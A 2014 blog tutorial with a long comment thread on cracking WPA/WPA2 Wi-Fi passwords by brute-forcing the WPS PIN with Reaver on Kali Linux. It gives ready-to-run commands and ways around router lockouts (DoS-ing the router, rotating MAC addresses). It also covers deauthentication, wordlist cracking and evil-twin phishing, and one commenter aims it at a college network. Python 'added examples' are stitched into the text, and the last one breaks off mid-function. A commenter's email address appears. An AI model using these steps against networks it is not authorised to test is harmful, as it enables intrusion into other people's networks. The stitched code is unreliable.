Monday, April 7, 2014

Hack WPA/WPA2 WPS - Reaver - Kali Linux

WPA/WPA-2


When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys responded with a much more robust security measure, WPA/WPA2.
Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive brute force including all the letters (uppercase and lowercase) and numbers may take years, depending on password length. Rainbow tables are known to speed things up by completing a part of the guessing job beforehand, but the resulting rainbow table that needs to be downloaded from the net is disastrously large (sometimes hundreds of GBs). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for users to configure. With this in mind, a new security measure was introduced to complement WPA: Wi-Fi Protected Setup (WPS). Basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on the router and the device connects). However, it had a hole, which is now well known, and tools like Reaver can exploit it with a single one-line command. It still might take hours, but that is much better than the previous scenario in which months of brute-forcing would yield no result.



Here's what Wikipedia says about WPS-
Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

Working of WPS

Now while most things are the same as in WPA, there is a new concept of using PINs for authentication. So basically, the client sends an 8-digit PIN to the access point, which verifies it and then allows the client to connect. Now a PIN has 8 digits and only contains numbers, so it's a possible target for brute force. Under normal brute-forcing of WPA passwords, you have to consider the fact that there may be numbers, letters, and sometimes symbols (and more than 8 characters). This makes the task a billion billion times tougher. However, we can try thousands of keys per second, which makes it a tad bit easier. Now in WPS, there is a delay because we have to wait for the AP's response, and we may only try a few keys per second (practically, the best I've seen on my PC is 1 key per 2 seconds). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as "raised to the power of") seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it.
  • The 8th digit is a checksum of the first 7 digits. 10^7 possibilities, i.e. one-tenth of the time. Two months, still a way to go.
  • The PIN goes for verification in two halves, so we can independently verify the first four and the last four digits. And believe me, it's easier to guess 4 digits correctly two times than to guess 8 digits correctly at once. Basically, the first half would take 10^4 guesses and the second would take 10^3 (its last digit is the checksum, so only three of its digits are free).
Now the guesses would be 10^4 + 10^3 (not 10^4 * 10^3). Now we need 11,000 guesses.
So that'll take 3 hours approximately. And that's all the combinations, and most probably the correct PIN will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that brute-forcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds.
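As an added worked example (not part of the original post), here is the PIN arithmetic above in Python: the public WPS check-digit rule (alternate digits weighted by 3, the 8th digit padding the sum to a multiple of 10), a validator for 8-digit PINs, and the worst-case guess counts and hours for 10^8, 10^7 and 10^4 + 10^3 at a given seconds-per-PIN rate. It goes one step beyond the text with a simplified lockout model (my own assumption: one fixed pause after every block of attempts) to show why the AP rate limiting mentioned later in this post changes the picture; all function names are mine.

```python
# Added example, not from the original post: the WPS PIN checksum rule and the
# search-space arithmetic the text walks through (10^8 -> 10^7 -> 10^4 + 10^3).
# Function names and the lockout model are assumptions of this example.

def wps_checksum(first7: int) -> int:
    """Return the 8th (check) digit for the first seven digits of a WPS PIN.

    Public WPS rule: counting from the right, odd-position digits are weighted
    3x and even-position digits 1x; the check digit pads the weighted sum up to
    the next multiple of 10. Example: 1234567 -> 0, giving the PIN 12345670.
    """
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct check digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def guess_counts() -> dict:
    """Worst-case number of PIN attempts under each level of known structure."""
    return {
        "naive": 10 ** 8,            # 8 free digits
        "checksum": 10 ** 7,         # 8th digit derived from the first 7
        "split": 10 ** 4 + 10 ** 3,  # halves confirmed separately by the AP
    }


def hours_for(guesses: int, seconds_per_pin: float) -> float:
    """Wall-clock hours to exhaust `guesses` attempts at a steady rate."""
    return guesses * seconds_per_pin / 3600.0


def hours_with_lockout(guesses: int, seconds_per_pin: float,
                       attempts_before_lock: int, lock_seconds: float) -> float:
    """Same as hours_for, but the AP pauses for lock_seconds after every
    block of attempts_before_lock attempts (simplified rate-limiting model).
    """
    locks = guesses // attempts_before_lock
    return (guesses * seconds_per_pin + locks * lock_seconds) / 3600.0


if __name__ == "__main__":
    print("12345670 valid:", is_valid_pin("12345670"))
    for name, n in guess_counts().items():
        print(f"{name:>8}: {n:>10} guesses, {hours_for(n, 1.0):.1f} h at 1 s/PIN")
    print("11,000 guesses with a 60 s pause every 10 attempts:",
          f"{hours_with_lockout(11000, 1.0, 10, 60):.1f} h")
```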


How to carry out the attack

Now it might have been tough to carry out this attack at some point in history, but now, it's a breeze. If you have all the prerequisites, then hacking the network would be as easy as
reaver -i <interface-name> -b <BSSID of target>
And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 minutes later, check the progress (it should be 1% or something), and go take a nap. However, if you're a newbie, then tag along.

Kali Linux

First off, you need to have Kali Linux (or BackTrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on hacking with Kali Linux. (Reaver has a known issue: sometimes it doesn't work with virtual machines, and you might have to do a live boot using a live CD or live USB of Kali Linux. See the last section of this post on troubleshooting by scrolling down a bit.)

Information Gathering

Now you need to find out the following about your target network-
  • Does it have WPS enabled? If not, then the attack will not work.
  • The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and is therefore much easier to use. Here are the steps-

  • Set your wireless interface in monitor mode- 
airmon-ng start wlan0

  • Use wash (easy, but sometimes unable to detect networks even when they have WPS enabled). If any network shows up there, it has WPS enabled.
wash -i mon0

This will show all the networks with WPS enabled

This is an error which I haven't figured out yet. If you see it, then you'll have to do some homework, or move on to the airodump method. Update: wash -i mon0 --ignore-fcs might solve the issue.


  • Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to the next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.

BSSID of the network - Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need.

So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it.

Reaver

Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enter-
reaver -i mon0 -b XX:XX:XX:XX:XX:XX 
Explanation: -i is the interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0? This is what we are using. -b specifies the BSSID of the network that we found out earlier.
This is all the information that Reaver needs to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything that's going on to the terminal. This helps you see what's happening, track the progress, and if needed, do some troubleshooting. So the final command should be-
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
After some hours, you will see something like this. The PIN in this case was intentionally 12345670, so it was hacked in 3 seconds.



WPA PSK : X
X is the password of the wireless network.

Here is an extra section, which might prove useful.

Known problems that are faced - Troubleshooting

  1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6". (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching channels forever.
  2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
  3. Sometimes it never associates with the target AP.
  4. Sometimes the response is too slow, or never comes, and an error like (0x02) is displayed.
In most cases, such errors suggest-
  1. Something wrong with wireless card.
  2. AP is very choosy, won't let you associate.
  3. The AP does not use WPS.
  4. You are very far from the AP.
  5. Rate limiting implemented in the router (most new routers have this)
Possible workarounds-
  1. Sometimes, killing naughty processes helps. (see pictures below)
  2. Move closer to target AP
  3. Do a fake auth using aireplay-ng (check "Speeding up WEP hacking") and tell Reaver not to bother, as we are already associated, using -A (just add -A at the end of your normal reaver command)
  4. If you are using Kali Linux in VMware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. In my case, booting up from USB and using the internal adapter increased the signal strength and sped up the brute-force process. Update: It has nothing to do with the internal adapter. I have verified this with many others, and it is now a known problem with Reaver. It does not work well inside virtual machines. It is recommended that you do a live boot.
  5. As far as rate limiting is concerned, there are a few workarounds available in forums across the web, but nothing seems to work with 100% certainty. Here is a relevant discussion on GitLab, here is a solution on the Hak5 forums which has a script and uses the mdk5 tool (it doesn't work for me; it's supposed to DoS the router and reset the ban temporarily), and here is a thread on the Kali Forums on the same issue, which has various possible solutions listed (including a method which changes your MAC address regularly [sorry if the download link on the thread there doesn't work] and hence allows reaver to work against routers which lock out the particular MAC address that is attacking them and don't lock down completely).
  6. Update: For some people the reason Reaver is not working is that the version of libpcap you are using is not compatible with the version of Kali you are using.
processes causing problems

Kill 'em all


A lot of people have shared their experiences in the comments section. Help out if you can, seek help if you need any. I can't always respond, but someone usually does.

Can't get it to work

Even after all your attempts, if you can't get it to work, then the AP just isn't vulnerable. You have the following alternatives-
  1. If you were following the tutorials one by one in the order shown in the top navigation bar (Hack With Kali -> Wireless Hacking), then you have learnt all you needed in this tutorial (even if you failed to get WPA-PSK), and can move to the next ones.
  2. If you just want to see if you can hack a WPA network, then there are three posts below which will help you with that without relying on WPS vulnerability.

Full blown cracking

You need to follow both of these guides, as they are step 1 and step 2 in the procedure of hacking WPA2 wifi networks.


Shortcut method, attack the human, not the network

Fool a client who knows the password into connecting to a fake wifi network and giving you the password of the genuine one.

122 comments:

  1. Are there any other ways to hack WPA/WPA2 except reaver and aircrack? Thx

    ReplyDelete
    Replies
    1. Wifite is there. It also uses Reaver only, except it types the commands for you.

      http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html

      Delete
    2. Friends, I'm from Brazil, very pleased. Would there be a solution to this? - WARNING: Detected AP rate limiting, waiting 60 seconds

      Delete
    3. Friends, I'm from Brazil, very pleased. Would there be a solution for this? - WARNING: Detected AP rate limiting, waiting 60 seconds.

      Thanks for listening

      Delete
    4. Alex, try the option -N. Much quieter and probably will not activate rate limiting. You could also use -d [time in seconds] to set a delay time between attempts. Start with a number like 10, then work down. Good luck!

      Delete
    6. I don't have any ideas, because I tried everything: reaver, bruteforce, wifite, and many more. So I think I am missing something which I don't know or which doesn't exist yet, so if you or anyone of you knows something, please tell me.
      My email is rahulspide26@gmail.com

      Delete
  2. Has anybody else used Fern?

    ReplyDelete
    Replies
    1. The only notable thing about Fern is the GUI. It makes stuff easy for beginners, but honestly, that's no way of becoming a hacker. GUI should be avoided most of the time.

      Delete
    2. Yes, I used Fern for WEP security; it takes 30 minutes to break the WEP password

      Delete
  3. To get rid of the FCS issue:
    #wash -i wlan0 --ignore-fcs

    ReplyDelete
  4. OK, but how to hack WPA/WPA2 with PSK??

    ReplyDelete
  5. Is it possible to hack a WPA2 network with a random alphanumeric 15-character password? I think this kind of password does not exist in any dictionary..

    ReplyDelete
  6. Hi there, I'm trying to do it on my college wifi. Although the network supports WPS, on giving the reaver command as you said, it returns a kind of note: "failed to retrieve a MAC address".

    Also, I'm not able to successfully get a WPA handshake with the command "aireplay-ng --deauth 1 -a mon0". Please can you solve these problems?

    ReplyDelete
    Replies
    1. When I type the command to see all networks, "airodump-ng mon0", and after selecting a particular BSSID I hit the command "airodump-ng -w (name of essid) --bssid (bssid of the network) mon0 -c (number of the channel)", it returns the same window, but at the upper right corner it always switches channel from one to another, or is sometimes fixed to a particular one; it shows something like "fixed channel mon0:-1". Please solve this problem!

      Delete
    2. So I've done everything without problems but after checking the terminal Reaver says that there is approximately 207 hours and 36 minutes remaining. Is that normal?

      Delete
  7. I used crunch to create a word list for brute force, but even for an only-numerical word list it takes 100's of GB. How can I get a word list of less than 10 GB?

    ReplyDelete
  8. I googled it and I got this
    "crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -"

    ReplyDelete
    Replies
    1. Looks good enough.
      I think it'll work just fine.

      Delete
  9. Can you tell me how to boot Kali Linux from CD? Currently I am using it in VirtualBox.

    ReplyDelete
    Replies
    1. Try Live USB instead. http://docs.kali.org/installation/kali-linux-live-usb-install

      Delete
    2. Get PowerISO, and then use the tool option where you can find "Create bootable pendrive". Then select the iso file... then after it completes, restart the PC from the pendrive. All done. Select the boot method. thats st

      Delete
  10. Can anyone tell me how we can change the channel of any network which is appearing on the airodump terminal? As sometimes my mon0 is fixed to channel 1, so maybe I can receive a network on 1 which previously was coming on channel 6 or 7, whatever

    ReplyDelete
    Replies
    1. iwconfig wlan0 channel 6
      iwconfig mon0 channel 6
      airodump-ng mon0 -c 6
      That should be enough.

      Delete
  11. Please, Shashwat, can you provide me a good wordlist? I have one wordlist which is a .txt file of about 22 MB, but I tried it on a network with Fern, and finally the result came out: 'the list does not contain the password'. So please give a link to a wordlist which you think would be enough to break the pass.

    ReplyDelete
    Replies
    1. Have you tried creating your own with the crunch command? If you are looking for a good wordlist I would recommend rockyou.txt; it's ~14 million passwords and 60 MB. https://wiki.skullsecurity.org/Passwords

      Delete
  12. How to get the SSID of a hidden network?

    ReplyDelete
    Replies
    1. Use aireplay-ng to carry out a de-authentication attack on a client. After that when the client reconnects you'll get the SSID.

      Delete
  13. Hi, can I ask a few questions?

    First, I tried cracking a WPA2 password. I've almost finished cracking, and at the last step I need to use this command

    "aircrack-ng -w wordlist.txt --bssid 00:11... wordlist-01.cap"

    but it says that my wordlist can't be found. So how do I check this wordlist, or how can I make it?

    Second, I tried to use this command

    "wash -i [your interface] [Mine is wlan0] -c CHANNEL_NUM -C -s"

    but it only replies

    ''[!] Found packet with bad FCS, skipping...''

    and never stops. Can you help me please?
    Hope to get this info ASAP.

    ReplyDelete
    Replies
    1. You have to download the wordlist from the internet.
      Try --ignore-fcs, it might solve the bad FCS issue.

      Delete
  14. I get the 0x03 and the 0x04 error all the time: "WPS transaction failed, re-trying last pin". I have tried with different networks but it is always the same. One of them says "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking", but that is all it does. What can I do? :'(

    ReplyDelete
  15. I get the 0x03 and the 0x04 error all the same ("WPS transaction failed, re-trying last pin"). I have tried with different networks, but it is always the same. One of them says: "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking", but that is all it does. What can I do? :'(

    ReplyDelete
  16. Thanks! I dual booted and it solved the problem :D

    ReplyDelete
  17. Since I have only 150GB for the Kali installation, I use Reaver all the time. It is one of the best tools I've used. It doesn't consume disk space or hardware resources. It is just what everyone who's testing wants.
    One thing I do, and it could help someone, is to make Reaver start from a specified number. If you know the WPS default first numbers, and you think that the WPS PIN wasn't changed, you can Google to find the first 1, 2, 4 numbers... Then, you give Reaver all the information you would normally put, and in the attribute -P put the first numbers you may know. Execute the command and stop it a few seconds later by pressing CTRL+C. Don't be scared if you see that the WPS PIN sent is 4 numbers long. Now, you should run the same command again, but erasing -P this time. Now, the program will think that it checked the previous PINs and will take less time. Or more, if the password is not default... But if you have no patience, you could try it out. I.e., if you give the app the 4 first numbers, the scan will take only 1:30h with 999 tries.
    This is also a way to avoid the manual edit of './usr/local/etc/reaver/*.wpc'.

    Sorry for my poor English level, I did not sleep and I'm even worse. :c

    ReplyDelete
    Replies
    1. Thank you for sharing this with us. Your English is fine by the way.

      Delete
  18. Hi, when we try 2 or 3 pins in Kali Linux using reaver, an error occurs, just like this: (WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking)

    ReplyDelete
  19. I keep on getting this -
    WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Switching mon0 to channel 11
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2015-02-01 11:32:53 (0 seconds/pin)
    [+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
    [+] Trying pin 12345670

    Why is it trying the same pin again and again?

    ReplyDelete
    Replies
    1. Maybe you're too far from the AP (signal strength?). Maybe you need a better wireless adapter (are you using laptop's internal card?). Maybe the AP does not have WPS enabled (does the AP appear in wash?)

      Delete
    2. Yes it does!
      I'm using the laptop's internal wireless adapter.
      I think I should use an external adapter because sometimes ARP injection (WEP) doesn't work either

      Delete
    3. Yes, you should use an external adapter. The internal ones do a good job of receiving messages from the AP, but they aren't so good at (and are not designed to) inject packets into the AP (i.e. they aren't as good at transmitting packets as they are at receiving them).

      Delete
  20. Prateek, I wasn't able to do much either until yesterday.
    I got a decent wireless card and after that I was able to associate via aireplay-ng -1 and as soon as that happened I ran reaver. Now I am dealing with the wps lock, but I am taking my time. Patience is a virtue ;)

    ReplyDelete
  21. How can I install Wine in 64-bit Kali Linux?????

    ReplyDelete
  22. Every time I try either wash or airodump-ng it comes up saying that it fails to open mon0 for capturing. Do I need to use a wifi adapter, or use a live version of Kali Linux from USB?

    ReplyDelete
  23. What if WPS is not active on the router??

    ReplyDelete
    Replies
    1. Then you cannot hack it. WPS must be enabled in order to attack the AP via pin attempts.

      Delete
    2. Try to attack it with a wordlist instead. The author of this article mentioned it above.

      Delete
  24. Is there a way of hacking a wireless network in which WPS is disabled?
    It was activated before, but now it is off

    ReplyDelete
  25. I have made a modification to reaver to automate the process for the pixie dust attack; here is the GitHub (https://github.com/t6x/reaver-wps-fork-t6x), and here is the discussion topic (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)

    ReplyDelete
  26. Hi, reaver on my PC is slow, 10 seconds/pin.
    How do I speed it up?

    ReplyDelete
  27. Hello, I followed this tut, but is it okay that my terminal keeps saying:
    [+] 0.00% complete @ 2015-04-30 21:36:28 (0 seconds/pin)
    [+] Max time remaining at this rate: (undetermined) (11000 pins left to try)

    I'm running Kali on my crappy netbook; should I use my desktop with VirtualBox instead?

    thanks for the help

    ReplyDelete
  28. [#] Drone Hijacking With Maldrone — Drone Malware

    http://beinghaxor.blogspot.com/2015/05/drone-hijacking-with-maldrone-drone.html

    ReplyDelete
  29. [#] Traffic Lights Hacking

    http://beinghaxor.blogspot.com/2015/05/traffic-lights-hacking.html

    ReplyDelete
  30. AP rate limiting detected...
    Any solution to this problem?

    ReplyDelete
  31. wash -i mon0 -C.
    Reaver with the options -L -E -A -T 2 -d 2 and other options gives results.
    To unblock WPS?

    ReplyDelete
  32. Is there any free online book or PDF for Kali Linux hacker beginners?

    ReplyDelete
  33. Hello, I am facing a lot of errors when I'm using Kali Linux; actually I can't do anything, because it comes up with errors every time I try cracking WPA or creating payloads.

    When using reaver I get this error code: 0x04. I am typing in this

    reaver -i mon0 -b "BSSID" -d "delayed time" -S -N -vv

    where -S should increase cracking speed and -N should stop the nacking.
    I have tried with -d 5/10/15/20/25/30, and also tried with and without -S, with and without -N, and I have tried -c, which specifies the channel.

    But it keeps saying WPS transaction failed, error code: 0x04

    Why is that?

    And when I try out this specific command
    reaver -i mon0 -A -b 00:30:4F:XX:XX:XX -c 6 -d 10 -vv --no-nacks --win7

    It comes up with the error [!] WARNING: Receive timeout occurred

    Why is that, and how do I fix these reaver problems I am facing?
    I have researched on Google for 2 days now, and no one has the answer I am looking for.

    Also, when I use the wash command the RSSI = 0 on all the networks that I can find.
    I think this is the main problem for why reaver doesn't work

    And just another thing: when I try using the setoolkit, when I have pressed 1 - 10 and try pressing 1 for the social engineering tool, it says something about ratte_module not defined. If someone has a link to fix that, I would be soooo happy :-)

    ReplyDelete
    Replies
    1. I think the error code 0x04 occurs when receiving the M1 message and sending out M2. The -N should stop this (I have read), but it doesn't. I will copy the outcome in the terminal and post it here later.

      Delete
  34. I have followed everything but when I start the reaver I am getting "WPS transaction failed (code: 0x03), re-trying last pin" I am using an external wlan.

    ReplyDelete
    Replies
    1. Did you check with wash if WPS is enabled? Maybe they are using rate limiting measures.

      Delete
    2. try using reaver with -N or --no-nacks option

      Delete
  35. When I use reaver to attack it stops when it outputs waiting for a beacon. If I don't specify which channel the network is it will just flip through the channels over and over. Any advice?

    ReplyDelete
    Replies
    1. Fix a channel on your wlan0 and mon0 interface. The beacon frame issue resolved itself in my case (one day it was there, then it was not). I suspect it might have something to do with signal strength.

      Delete
  36. Does Reaver still work? Or have most companies already patched their WPS so that this method doesn't work anymore? If it works, which external wireless card would work? Thank you.

    ReplyDelete
  37. I need help with external adapters for my VM on my Mac 10.10; do you know any I could get?

    ReplyDelete
  38. Please help, I can't find an adapter that will work with my computer

    ReplyDelete
    Replies
    1. lol, go to PCPartPicker after looking up what components are inside your computer on the manufacturer's site; after you know what motherboard you have, it shouldn't be very hard to find a compatible adapter

      Delete
  39. wifite not working, man..
    after waiting so long, 8 mins, it says 0/1 wpa attacks failed...
    is there something I can do?

    ReplyDelete
  40. This error ("detecting ap limit rate") keeps coming after 10 pin tests. What to do about it? Any solution? And it doesn't
    go for a whole day

    ReplyDelete
  41. When do we have to use a wordlist in the tutorial??

    ReplyDelete
  42. Is it possible to try to find out the password of a wifi network that you're connected to? Because I am just trying to test my own connection. Thanks

    ReplyDelete
    Replies
    1. go into your windows network settings and "Forget This Network" then proceed with the tutorial

      Delete
    2. Yeah, it's actually really simple.
      Right click on the W-LAN icon in your taskbar and choose "network and idk (I'm German)"; as soon as the window opens, choose your connected W-LAN and click on "wireless features". Now there should be a tab called security, in which you can check a box that says "show symbols". You're welcome :D

      Delete
  43. If network-manager is being used in Ubuntu, you get the error "SIOCSIFFLAGS: Name not unique on network". First stop network-manager.

    /etc/init.d/network-manager stop

    ReplyDelete
  44. Does it need an internet connection to hack wifi?

    ReplyDelete
  45. Please help me. I'm using a TP-Link TL-WN722N, as per the recommended wireless adapter.. But unable to work with reaver again... What do I have to do.. The problem is the AP rate limit of 60 sec.. And in pixiewps it is unable to crack WPS. It just stopped automatically without trying any pin..

    ReplyDelete
  46. I am connected to the wifi. How do I get the WPS PIN of this wifi, so that I get the password easily every time the password changes?

    ReplyDelete
  47. I bet every last one of you geeks has long hair, a heavy metal t-shirt and a complexion that has never seen the sun. Grep a life!

    ReplyDelete
    Replies
    1. And you would be incorrect. Short hair (what's left of it at 46) pretty strong tan from being out on the boat every weekend, married with a child, and no heavy metal t shirts for the last 20 years or so. awk-ward.

      Delete
  48. Oops! I have a problem. When I enter the command "reaver -i mon0 -b xx:xx:xx:xx:xx -vv", this writes over and over and nothing happens, please help me!
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    ReplyDelete
  49. Is there anybody here?

    ReplyDelete
  50. Any ideas on what to do when you get the WPS PIN but the WPA PSK is '' (empty brackets)?
    What other tools or techniques could be used to obtain the WPA PSK?

    ReplyDelete
  51. Once you get the PIN, do you just enter it in place of the password key when logging in?

    ReplyDelete
  52. What to do with the WPS PIN, as I know the WPS PIN of the wifi?? How to hack the password??

    ReplyDelete
  53. Just Try This Bash Script ;)

    https://www.youtube.com/watch?v=IxHR-_p5JrY

    ReplyDelete
  54. I just wanna know if this way will work on a LIVE BOOTED KALI LINUX 1.1 OR 2.0. I have both

    ReplyDelete
  55. Hey everyone I have a stupid question. When running reaver I almost instantly get the following:
    root@bt:~# reaver -i mon0 -b 00:26:F2:26:B3:12 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:26:F2:26:B3:12
    [+] Switching mon0 to channel 6
    [+] Associated with 00:26:F2:26:B3:12 (ESSID: DO_946757)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 10 seconds
    [+] WPS PIN: '12345670'
    [+] WPA PSK: ''
    [+] AP SSID: 'DO_946757'
    [+] Nothing done, nothing to save.
    root@bt:~#

    So my question is, what is the password now, actually? I have tried '12345670' and 'DO_946757' but neither works. If I go with the -p option I get:
    root@bt:~# reaver -i mon0 -b 00:26:F2:26:B3:12 -vv -p 12345670

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:26:F2:26:B3:12
    [+] Switching mon0 to channel 6
    [+] Associated with 00:26:F2:26:B3:12 (ESSID: DO_946757)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 4 seconds
    [+] WPS PIN: '12345670'
    [+] Nothing done, nothing to save.
    root@bt:~#
    Thanks for any help.

    Replies
    1. Hello, does someone know what the problem is?

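The trace in comment 55 is worth reading message by message. Reaver acts as the external registrar and the AP as the enrollee: when the AP answers Reaver's M4 with M5 it has accepted the first half of the PIN, and when it answers M6 with M7 it has accepted the second half and M7 is the message that carries the AP's credential, which is why Reaver reports the PIN as cracked even though the PSK it printed is empty. The Python below is an added example, not part of the original post or of Reaver: a small parser for Reaver's verbose (-vv) output that records how far each attempt got and pulls out the final PIN/PSK/SSID lines. SAMPLE_LOG is a constructed, trimmed copy of the trace above, and STAGE_MEANING is this example's own reading of the WPS message numbers.

```python
# Added example: a parser for Reaver's verbose (-vv) output. This is not Reaver's
# code; SAMPLE_LOG is a constructed, trimmed copy of the trace posted above.
import re
from collections import Counter

SAMPLE_LOG = """\
[+] Waiting for beacon from 00:26:F2:26:B3:12
[+] Switching mon0 to channel 6
[+] Associated with 00:26:F2:26:B3:12 (ESSID: DO_946757)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 10 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: ''
[+] AP SSID: 'DO_946757'
[+] Nothing done, nothing to save.
"""

TRY_PIN = re.compile(r"^\[\+\] Trying pin (\d{8})")
RECEIVED = re.compile(r"^\[\+\] Received (M[1-8]) message")
FAILED = re.compile(r"^\[!\] WPS transaction failed \(code: (0x[0-9A-Fa-f]+)\)")
RESULT = re.compile(r"^\[\+\] (WPS PIN|WPA PSK|AP SSID): '(.*)'$")

# Reaver plays the external registrar; the AP is the enrollee. The highest
# message the AP sent in an attempt says how much of the PIN it accepted.
STAGE_MEANING = {
    None: "no WPS messages received from the AP",
    "M1": "handshake started, no PIN half checked yet",
    "M3": "AP sent its hashes, first half (M4) not yet answered",
    "M5": "first half of the PIN accepted",
    "M7": "whole PIN accepted; M7 is where the AP's credential travels",
}


def parse_reaver_log(text):
    """Group the trace into attempts and pull out the final PIN/PSK/SSID lines."""
    attempts = []           # one dict per "Trying pin" line
    failures = Counter()    # transaction failure codes, e.g. 0x03
    result = {"pin": None, "psk": None, "ssid": None}
    current = None
    for line in text.splitlines():
        m = TRY_PIN.match(line)
        if m:
            current = {"pin": m.group(1), "furthest": None}
            attempts.append(current)
            continue
        m = RECEIVED.match(line)
        if m and current is not None:
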